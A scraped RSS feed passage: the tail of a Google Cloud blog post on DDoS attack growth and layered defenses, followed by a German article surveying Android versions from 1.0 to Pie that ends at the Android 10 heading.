this period informed our decision of what to use for the first data point of each metric.)</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/DDoS_attacks.max-1000x1000.jpg" alt="DDoS attacks.jpg">
        
        
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>The exponential growth across all metrics is apparent, often generating alarmist headlines as attack volumes grow. But we need to factor in the exponential growth of the internet itself, which provides bandwidth and compute to defenders as well. After accounting for the expected growth, the results are less concerning, though still problematic.</p><h3>Architecting defendable infrastructure</h3><p>Given the data and observed trends, we can now extrapolate to determine the spare capacity needed to absorb the largest attacks likely to occur.</p><p><b>bps</b> (network bits per second)<br>Our infrastructure absorbed a 2.5 Tbps DDoS in September 2017, the culmination of a six-month campaign that utilized multiple methods of attack. Despite simultaneously targeting thousands of our IPs, presumably in hopes of slipping past automated defenses, the attack had no impact. The attacker used <a href="https://blog.google/threat-analysis-group/how-were-tackling-evolving-online-threats" target="_blank">several networks</a> to spoof 167 Mpps (millions of packets per second) to 180,000 exposed CLDAP, DNS, and SNMP servers, which would then send large responses to us. This demonstrates the volumes a well-resourced attacker can achieve: This was four times larger than the record-breaking 623 Gbps attack from the Mirai botnet a year earlier. It remains the highest-bandwidth attack reported to date, leading to reduced confidence in the extrapolation.<br></p><p><b>pps</b> (network packets per second) <br>We’ve observed a consistent growth trend, with a 690 Mpps attack generated by an IoT botnet this year. A notable outlier was a 2015 attack on a customer VM, in which an IoT botnet ramped up to 445 Mpps in 40 seconds—a volume so large we initially thought it was a monitoring glitch!</p><p><b>rps</b> (HTTP(S) requests per second)<br>In March 2014, malicious javascript injected into thousands of websites via a network man-in-the-middle attack caused hundreds of thousands of browsers to flood YouTube with requests, peaking at 2.7 Mrps (millions of requests per second). That was the largest attack known to us until recently, when a Google Cloud customer was attacked with 6 Mrps. The slow growth is unlike the other metrics, suggesting we may be under-estimating the volume of future attacks.</p><p>While we can estimate the expected size of future attacks, we need to be prepared for the <i>unexpected</i>, and thus we over-provision our defenses accordingly. Additionally, we design our systems to degrade gracefully in the event of overload, and write playbooks to guide a manual response if needed. For example, our layered defense strategy allows us to block high-rps and high-pps attacks in the network layer before they reach the application servers. Graceful degradation applies at the network layer, too: Extensive peering and network ACLs designed to throttle attack traffic will mitigate potential collateral damage in the unlikely event links become saturated.</p><p>For more detail on the layered approach we use to mitigate record-breaking DDoS attacks targeting our services, infrastructure, or customers, see Chapter 10 of our book, <a href="https://landing.google.com/sre/resources/foundationsandprinciples/srs-book/" target="_blank">Building Secure and Reliable Systems</a>.</p><h3>Cloud-based defenses</h3><p>We recognize the scale of potential DDoS attacks can be daunting. Fortunately, by deploying <a href="https://cloud.google.com/armor">Google Cloud Armor</a> integrated into our <a href="https://cloud.google.com/load-balancing">Cloud Load Balancing </a>service—which can scale to absorb massive DDoS attacks—you can protect services deployed in Google Cloud, other clouds, or on-premise from attacks. We recently announced <a href="https://cloud.google.com/blog/products/identity-security/google-cloud-armor-features-to-protect-your-websites-and-applications">Cloud Armor Managed Protection</a>, which enables users to further simplify their deployments, manage costs, and reduce overall DDoS and application security risk.</p><p>Having sufficient capacity to absorb the largest attacks is just one part of a comprehensive DDoS mitigation strategy. In addition to providing scalability, our load balancer terminates network connections on our global edge, only sending well-formed requests on to backend infrastructure. As a result it can automatically filter many types of volumetric attacks. For example, UDP amplification attacks, synfloods, and some application-layer attacks will be silently dropped. The next line of defense is the Cloud Armor WAF, which provides built-in rules for common attacks, plus the ability to deploy custom rules to drop abusive application layer requests using a broad set of HTTP semantics.</p><h3>Working together for collective security</h3><p>Google works with others in the internet community to identify and dismantle infrastructure used to conduct attacks. As a specific example, even though the 2.5 Tbps attack in 2017 didn't cause any impact, we reported thousands of vulnerable servers to their network providers, and also worked with network providers to trace the source of the spoofed packets so they could be filtered.</p><p>We encourage everyone to join us in this effort. Individual users should ensure their computers and IoT devices are patched and secured. Businesses should report criminal activity, ask their network providers to trace the sources of spoofed attack traffic, and share information on attacks with the internet community in a way that doesn't provide timely feedback to the adversary. By working together, we can reduce the impact of DDoS attacks.</p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Alle Android-Versionen im Überblick]]></title>
<description><![CDATA[Die Android-Versionshistorie ist – zumindest bis ins Jahr 2018 – mit süßen Versuchungen gepflastert.
					Foto: Olezzo – shutterstock.com




Googles mobiles Betriebssystem Android blickt auf bescheidene Anfänge zurück und wurde über die Jahre immens weiterentwickelt – sowohl auf optischer als au...]]></description>
<link>https://tsecurity.de/de/3661174/it-security-nachrichten/alle-android-versionen-im-ueberblick/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661174/it-security-nachrichten/alle-android-versionen-im-ueberblick/</guid>
<pubDate>Sat, 11 Jul 2026 05:22:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Die Android-Versionshistorie ist - zumindest bis ins Jahr 2018 - mit süßen Versuchungen gepflastert." title="Die Android-Versionshistorie ist - zumindest bis ins Jahr 2018 - mit süßen Versuchungen gepflastert." src="https://images.computerwoche.de/bdb/3392474/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Die Android-Versionshistorie ist – zumindest bis ins Jahr 2018 – mit süßen Versuchungen gepflastert.</p></figcaption></figure><p class="imageCredit">
					Foto: Olezzo – shutterstock.com</p></div>




<p>Googles mobiles Betriebssystem <a href="https://www.computerwoche.de/article/2824401/die-besten-android-launcher.html" title="Android" target="_blank">Android</a> blickt auf bescheidene Anfänge zurück und wurde über die Jahre immens weiterentwickelt – sowohl auf optischer als auch konzeptioneller und funktioneller Ebene. Im Folgenden haben wir alle jemals erschienenen (relevanten) Android-Versionen im Zeitverlauf für Sie zusammengestellt – inklusive ihrer jeweiligen Highlights.</p>



<h2 class="wp-block-heading">Android 1.0/1.1</h2>



<p>Sein offizielles Debüt feierte <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> mit Version 1.0 im Jahr 2008 – damals noch ohne aparten Codenamen mit Backwerk-Bezug. In der Smartphone-Frühzeit waren die Dinge bei Android vor allem eines: simpel.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Der Homescreen von Android 1.0 - und sein rudimentärer Webbrowser." title="Der Homescreen von Android 1.0 - und sein rudimentärer Webbrowser." src="https://images.computerwoche.de/bdb/3392475/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Der Homescreen von Android 1.0 – und sein rudimentärer Webbrowser.</p></figcaption></figure><p class="imageCredit">
					Foto: T-Mobile</p></div>




<p>Dennoch konnte das Google-Betriebssystem bereits mit integrierten Apps aufwarten, etwa Gmail, Google Maps, Kalender oder Youtube. Ein krasser Gegensatz zum heute gängigen (und besser aktualisierbaren) Standalone-App-Modell. </p>



<h2 class="wp-block-heading">Android 1.5 Cupcake</h2>



<p>Mit dem Release von <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 1.5 begann Google, die Versionen seines Mobile OS nach teigigen Leckereien zu benennen. Eine Tradition, die über etliche Jahre Bestand haben sollte. Mit Cupcake hielten diverse Optimierungen der Benutzeroberfläche Einzug – unter anderem in Form der ersten virtuellen Bildschirmtastatur.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Bei Android Cupcake rückte Google Widgets in den Fokus." title="Bei Android Cupcake rückte Google Widgets in den Fokus." src="https://images.computerwoche.de/bdb/3392476/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Bei Android Cupcake rückte Google Widgets in den Fokus.</p></figcaption></figure><p class="imageCredit">
					Foto: Android Police</p></div>




<p>Vor allem führte Google mit Cupcake aber das Framework für Drittanbieter-App-Widgets ein, was sich schnell zu einem <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Alleinstellungsmerkmal entwickelte. Mit Android Version 1.5 war es außerdem erstmals möglich, auch Videoaufnahmen zu realisieren.</p>



<h2 class="wp-block-heading">Android 1.6 Donut</h2>



<p>Im Herbst 2009 erblickte <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> Version 1.6 – Codename Donut – das Licht der Welt. Diese Android-Version optimierte Googles mobiles Betriebssystem weiter, zum Beispiel mit Support für diverse verschiedene Bildschirmauflösungen und -formate. Ein besonders zukunftskritisches Feature für Android hielt mit der Unterstützung des Mobilfunkstandards <a href="https://de.wikipedia.org/wiki/Codemultiplexverfahren" title="CDMA" target="_blank" rel="noopener">CDMA</a> Einzug. Letzteres begünstigte die folgende explosionsartige Ausbreitung von <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Die Universal Search Box hatte mit Android Version 1.6 ihren ersten Auftritt." title="Die Universal Search Box hatte mit Android Version 1.6 ihren ersten Auftritt." src="https://images.computerwoche.de/bdb/3392477/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Die Universal Search Box hatte mit Android Version 1.6 ihren ersten Auftritt.</p></figcaption></figure><p class="imageCredit">
					Foto: Google</p></div>




<h2 class="wp-block-heading">Android 2.0/2.1 Eclair</h2>



<p>Nur sechs Wochen nach Donut ließ Google <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 2.0 mit dem Codenamen Eclair auf die Nutzer los – einige Monate später folgte das 2.1-Update. Das erste Smartphone, das diese Android-Version nutzte, war Motorolas Milestone. Das Smartphone wurde in den USA unter der Bezeichnung “<a href="https://www.pcworld.com/article/521008/droid_sales_and_the_android_explosion.html" title="Droid" target="_blank">Droid</a>” vermarktet und sollte den technikaffinen Gegenpol zu Apples <a href="https://www.computerwoche.de/k/iphone-apps,3459" target="_blank" class="idgGlossaryLink">iPhone</a> bilden – zumindest legte das die relativ aggressive Marketingkampagne in den USA nahe:</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p>Bei Apple dürfte jedoch vor allem <a href="https://www.computerworld.com/article/1515386/steve-jobs-called-for-holy-war-against-google.html" title="für Verstimmung gesorgt haben" target="_blank">für Verstimmung gesorgt haben</a>, dass mit Eclair auch die bis dahin iOS-exklusive “Pinch-to-Zoom”-Funktionalität in <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> eingeführt wurde. Die revolutionärsten Elemente dieser Android-Version waren jedoch sprachgesteuerte Turn-by-Turn-Navigation und Verkehrsinformationen in Echtzeit – bis dahin nicht realisierte Features in der Smartphone-Welt. Darüber hinaus hielten mit Eclair auch Live-Hintergrundbilder sowie die erste Speech-to-Text-Funktion Einzug. </p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Die erste Navigations- und Diktierfunktion in Android 2.0." title="Die erste Navigations- und Diktierfunktion in Android 2.0." src="https://images.computerwoche.de/bdb/3392478/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Die erste Navigations- und Diktierfunktion in Android 2.0.</p></figcaption></figure><p class="imageCredit">
					Foto: Google</p></div>




<h2 class="wp-block-heading">Android 2.2 Froyo</h2>



<p>Mit <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 2.2 widmete sich Google (vier Monate nach dem Release von Version 2.1) hauptsächlich Performance-Optimierungen unter der Haube. Android Froyo erweiterte jedoch die Benutzeroberfläche um einige praktische Funktionen – darunter das inzwischen zum Standard gewordene Dock am unteren Rand des Startbildschirms sowie die erste Version von Voice Actions. Letzteres erlaubte den Benutzern, einige grundlegende Funktionen wie Wegbeschreibungen oder Notizen abzurufen, indem sie ein Icon antippen und anschließend einen Sprachbefehl folgen lassen.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Froyo brachte Sprachsteuerung erstmals in ernsthafter Form auf Android-Telefone." title="Froyo brachte Sprachsteuerung erstmals in ernsthafter Form auf Android-Telefone." src="https://images.computerwoche.de/bdb/3392479/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Froyo brachte Sprachsteuerung erstmals in ernsthafter Form auf Android-Telefone.</p></figcaption></figure><p class="imageCredit">
					Foto: Google</p></div>




<p>Bemerkenswert ist <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> Version 2.2 vor allem auch deshalb, weil es den <a href="https://www.computerwoche.de/article/2823820/die-5-besten-chrome-alternativen.html" title="Android-Webbrowser" target="_blank">Android-Webbrowser</a> mit Flash-Unterstützung ausstattete. Das war nicht nur wichtig, weil Flash damals im Web allgegenwärtig war, sondern auch weil Apple sich standhaft weigerte, das <a href="https://www.computerwoche.de/k/iphone-apps,3459" target="_blank" class="idgGlossaryLink">iPhone</a> um Flash-Support zu erweitern. Das war eine ganze Zeit lang ein <a href="https://www.computerworld.com/article/1484597/flash-boom-bang-android-and-the-adobe-flash-clash.html" title="echter Vorteil für Android" target="_blank">echter Vorteil für Android</a> – bis sich die Flash-Dominanz schließlich in Luft auflöste.</p>



<h2 class="wp-block-heading">Android 2.3 Gingerbread</h2>



<p>Mit Gingerbread versuchte Google, <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> im Jahr 2010 erstmals eine echte, “visuelle Identität” zu verleihen. Die Farbe des Android-Maskottchens breitete sich mit Android Version 2.3 über die gesamte Benutzeroberfläche aus. Der erste Schritt hin zu einer eigenständigen Designsprache. </p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Mit Android Gingerbread nahm die Android-Designsprache ihren Anfang." title="Mit Android Gingerbread nahm die Android-Designsprache ihren Anfang." src="https://images.computerwoche.de/bdb/3392480/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Mit Android Gingerbread nahm die Android-Designsprache ihren Anfang.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<h2 class="wp-block-heading">Android 3.0/3.1/3.2 Honeycomb</h2>



<p>Die <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Honeycomb-Ära markierte ab 2011 einen weiteren Umbruch: Android 3.0 war ein <a href="https://www.computerwoche.de/k/tablet-pc,3453" target="_blank" class="idgGlossaryLink">Tablet</a>-exklusives Betriebssystem, das zum Marktstart des <a href="https://www.computerwoche.de/k/ipad,3456" target="_blank" class="idgGlossaryLink">iPad</a>-Konkurrenten <a href="https://de.wikipedia.org/wiki/Motorola_Xoom" title="Motorola Xoom" target="_blank" rel="noopener">Motorola Xoom</a> veröffentlicht wurde. Auch die Point-Updates 3.1 und 3.2 waren exklusiv auf die zu dieser Zeit stark gefragten <a href="https://www.computerwoche.de/k/tablet-pc,3453" target="_blank" class="idgGlossaryLink">Tablets</a> ausgelegt. </p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Android Honeycomb sollte Tablets einen " title="Android Honeycomb sollte Tablets einen " src="https://images.computerwoche.de/bdb/3392481/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Android Honeycomb sollte Tablets einen “Weltraum-ähnlichen”, “holografischen” Look verleihen.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<p>Zwar hatte das Konzept der <a href="https://www.computerwoche.de/k/tablet-pc,3453" target="_blank" class="idgGlossaryLink">Tablet</a>-spezifischen Oberfläche schon nach kurzer Zeit wieder ausgedient – allerdings wurden mit <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 3.0 zahlreiche Ideen umgesetzt, die das heute bekannte Android definiert haben: Honeycomb war die erste Android-Version, die die Nutzer essenzielle Navigationsbefehle über virtuelle Bildschirmtasten erledigen ließ und führte das Konzept einer “Karten-basierten” UI ein. </p>



<h2 class="wp-block-heading">Android 4.0 Ice Cream Sandwich</h2>



<p>Während Honeycomb so etwas wie eine “Brückenversion” darstellte, bildete <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 4.0 – Codename Ice Cream Sandwich – den offiziellen Einstiegspunkt in die neue Android-Designwelt. Veröffentlicht wurde diese Version ebenfalls im Jahr 2011 – und verfeinerte in erster Linie die mit Honeycomb eingeführten, visuellen Konzepte. Zudem vereinheitlichte Google mit dieser Android-Version sein Betriebssystem für Mobiltelefone und <a href="https://www.computerwoche.de/k/tablet-pc,3453" target="_blank" class="idgGlossaryLink">Tablets</a>.</p>



<p>Mit <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 4.0 wurde zudem die Steuerung über Wischbewegungen als integrale Methode etabliert, um sich zurechtzufinden – eine damals weltbewegende Neuerung. Darüber hinaus markierte Ice Cream Sandwich auch den Beginn der Umstellung des Android-Ökosystems auf ein standardisiertes Design-Framework, auch bekannt als “<a href="https://android-developers.googleblog.com/2012/01/holo-everywhere.html" title="Holo" target="_blank" rel="noopener">Holo</a>“.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Homescreen und App Switching in Android 4.0." title="Homescreen und App Switching in Android 4.0." src="https://images.computerwoche.de/bdb/3392482/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Homescreen und App Switching in Android 4.0.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<h2 class="wp-block-heading">Android 4.1/4.2/4.3 Jelly Bean</h2>



<p>Die Jelly-Bean-Ära erstreckte sich über drei <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Versionen und die Jahre 2012 und 2013. Dabei wurde das frische Fundament von Ice Cream Sandwich mit Bedacht, aber zielstrebig weiter optimiert und ausgebaut. Ergebnis war ein Android-Betriebssystem, das mit neuem Schwung und Glanz zunehmend auch Mobile-Durchschnittsbenutzer begeistern konnte.</p>



<p>Abgesehen von der Optik brachte Jelly Bean auch einen ersten Vorgeschmack auf Google Now (das leider inzwischen zu einem zweitklassigen Newsfeed <a href="https://www.computerworld.com/article/1713354/google-feed.html" title="verkommen ist" target="_blank">verkommen ist</a>). Weitere Benefits, die mit <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> Jelly Bean Einzug hielten, waren unter anderem ein erweitertes (sprachbasiertes) Suchsystem und Multi-User-Support. Letzteres stand allerdings nur auf <a href="https://www.computerwoche.de/k/tablet-pc,3453" target="_blank" class="idgGlossaryLink">Tablet</a>-Geräten zur Verfügung. Davon abgesehen, gab auch das Quick Settings Panel in dieser Android-Version sein Debüt – genauso wie Widgets für den Sperrbildschirm.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Quick Settings und der (kurzlebige) Widget-befüllte Lockscreen in Android Jelly Bean." title="Quick Settings und der (kurzlebige) Widget-befüllte Lockscreen in Android Jelly Bean." src="https://images.computerwoche.de/bdb/3392483/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Quick Settings und der (kurzlebige) Widget-befüllte Lockscreen in Android Jelly Bean.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<h2 class="wp-block-heading">Android 4.4 KitKat</h2>



<p>Mit Version 4.4 kam das Zeitalter der dunklen Farbgebung bei <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> zu einem Ende. KitKat brachte Ende 2013 frischere, hellere Farben für Googles Betriebssystem und sorgte damit für eine umfassende, optische Modernisierung. Premiere feierte mit Android 4.4 außerdem das allseits bekannte “OK, Google”-Freihand-Feature (das damals nur funktionierte, wenn der Startbildschirm oder die Google-App bereits geöffnet war).</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Der Kitkat-Homescreen und das dedizierte Google-Now-Panel." title="Der Kitkat-Homescreen und das dedizierte Google-Now-Panel." src="https://images.computerwoche.de/bdb/3392484/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Der Kitkat-Homescreen und das dedizierte Google-Now-Panel.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<p>Die Nutzer von Google-eigenen (Nexus-)Smartphones durften sich zudem erstmals an einem Startbildschirm-Panel erfreuen, das exklusiv für Google-Dienste reserviert war.</p>



<h2 class="wp-block-heading">Android 5.0/5.1 Lollipop</h2>



<p>Mit Lollipop führte Google im Herbst 2014 den bis heute gültigen <a href="https://www.computerworld.com/article/1618144/material-design-1-year-later-pocket-pocketcasts.html" title="Material-Design-Standard" target="_blank">Material-Design-Standard</a> bei <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> ein, der sich nicht nur auf das Betriebssystem selbst, sondern auch auf Apps und andere Google-Produkte auswirkte. Das kartenbasierte User Interface, das bislang punktuell in Android eingesetzt wurde, wurde mit Android 5.0 zum zentralen Designaspekt.</p>



<p>Davon abgesehen, brachte <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> Lollipop auch einige neue Funktionen in die Android-Welt – unter anderem den weiterentwickelten “Ok, Google”-Befehl, Multi-User-Support für Mobiltelefone sowie ein optimiertes Benachrichtigungsmanagement. Leider flossen mit Lollipop auch <a href="https://www.computerworld.com/article/1617255/broken-lollipop-android-50.html" title="diverse Bugs" target="_blank">diverse Bugs</a> ein, die in weiten Teilen erst mit der <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Version 5.1 ab 2015 vollständig behoben werden konnten.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Mit Lollipop nahm Androids Material Design seinen Anfang." title="Mit Lollipop nahm Androids Material Design seinen Anfang." src="https://images.computerwoche.de/bdb/3392485/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Mit Lollipop nahm Androids Material Design seinen Anfang.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<h2 class="wp-block-heading">Android 6.0 Marshmallow</h2>



<p>Im Großen und Ganzen war Marshmallow – ebenfalls im Jahr 2015 veröffentlicht – eine eher unbedeutende <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Version, die mehr wie ein Point-Update wirkte. Allerdings setzte Marshmallow den Startpunkt dafür, dass Google jährlich eine große neue Android-Version veröffentlicht.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Android Marshmallow und " title="Android Marshmallow und " src="https://images.computerwoche.de/bdb/3392486/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Android Marshmallow und “Now on Tap” (RIP).</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<p>Das auffälligste Marshmallow-Feature war die vielversprechende Bildschirmsuchfunktion “Now On Tap” – die leider nie weiterentwickelt und 2016 still und heimlich beerdigt wurde. <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 6.0 enthielt jedoch auch einige subtilere Neuerungen, etwa granularere App-Berechtigungen sowie Support für Fingerabdruckscanner und USB-C.</p>



<h2 class="wp-block-heading">Android 7.0/7.1 Nougat</h2>



<p>Die <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Versionen mit dem Codenamen Nougat wurden 2016 veröffentlicht und ergänzten Googles Mobile OS um einen nativen Split-Screen-Modus, ein neues System, um Benachrichtigungen zu managen, und eine Data-Saver-Funktion. Darüber hinaus hatte Android 7.0 bis 7.1 auch einige kleinere, aber dennoch wichtige Features an Bord – beispielsweise einen <a href="https://www.computerworld.com/article/1713251/time-saving-android-shortcuts.html" title="Shortcut" target="_blank">Shortcut</a>, um zwischen Apps zu wechseln.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Der mit Nougat neu eingeführte, native Split-Screen-Modus." title="Der mit Nougat neu eingeführte, native Split-Screen-Modus." src="https://images.computerwoche.de/bdb/3392487/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Der mit Nougat neu eingeführte, native Split-Screen-Modus.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<p>Die vielleicht wichtigste Neuerung von <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> Nougat war jedoch die Möglichkeit, den Google Assistant zu integrieren, der etwa zwei Monate nach dem Nougat-Debüt (zusammen mit Google <a href="https://www.computerworld.com/article/1667955/google-pixel-phone.html" title="erstem Pixel-Smartphone" target="_blank">erstem Pixel-Smartphone</a>) vorgestellt wurde. Der Assistant entwickelte sich in den kommenden Jahren zu einer wichtigen <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Komponente (und den meisten anderen Google-Produkten).</p>



<h2 class="wp-block-heading">Android 8.0/8.1 Oreo</h2>



<p>Mit Version 8.0 und 8.1 – veröffentlicht im Jahr 2017 unter dem Codenamen Oreo – erhielt <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> weitere Annehmlichkeiten. Unter anderem einen nativen Bild-in-Bild-Modus, eine Schlummerfunktion für Notifications sowie tiefgehendere Möglichkeiten, App-Benachrichtigungen zu kontrollieren. </p>



<p>Darüber hinaus war diese <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Version auch ein Versuch von Google, Android und Chrome OS <a href="https://www.computerworld.com/article/1711690/android-chrome-os-alignment.html" title="näher zusammenzubringen" target="_blank">näher zusammenzubringen</a> und die Nutzung von <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Apps auf Chromebooks zu optimieren. Davon abgesehen war Android 8 auch vom ehrgeizigen Bestreben geprägt, mit “<a href="https://www.computerworld.com/article/1680570/google-android-upgrades-project-treble.html" title="Project Treble" target="_blank">Project Treble</a>” eine modulare Basis für den <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Quellcode zu schaffen. Die Hoffnung: Es den Geräteherstellern einfacher zu machen, zeitnah Software-Updates bereitzustellen.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Android Oreo erweiterte Googles mobiles Betriebssystem um diverse bedeutende Funktionen." title="Android Oreo erweiterte Googles mobiles Betriebssystem um diverse bedeutende Funktionen." src="https://images.computerwoche.de/bdb/3392488/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Android Oreo erweiterte Googles mobiles Betriebssystem um diverse bedeutende Funktionen.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<h2 class="wp-block-heading">Android 9 Pie</h2>



<p><a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Version 9, auch bekannt unter dem Codenamen Pie, brachte im August 2018 frischen Wind in Googles Mobile-Ökosystem. Die wesentlichste Änderung war dabei ein <a href="https://www.computerworld.com/article/1689846/android-p-gesture-navigation.html" title="hybrides Gesten-Button-Navigationssystem" target="_blank">hybrides Gesten-Button-Navigationssystem</a>, das die traditionellen Navigationstasten mit einem großen, multifunktionalen “Home Button” ersetzte.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Alles neu machte Android 9 - zumindest in Sachen Bedienung." title="Alles neu machte Android 9 - zumindest in Sachen Bedienung." src="https://images.computerwoche.de/bdb/3392489/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Alles neu machte Android 9 – zumindest in Sachen Bedienung.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<p><a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> Pie enthielt allerdings auch einige bemerkenswerte neue Productivity-Funktionen, beispielsweise ein universelles System, um mit vorgeschlagenen Antworten auf Nachrichten zu reagieren oder ein intelligenteres Energiemanagement. Erwähnenswert sind bei dieser Android-Version zudem zahlreiche Optimierungen in Sachen Datenschutz und Sicherheit.</p>



<h2 class="wp-block-heading">Android Version 10</h2>



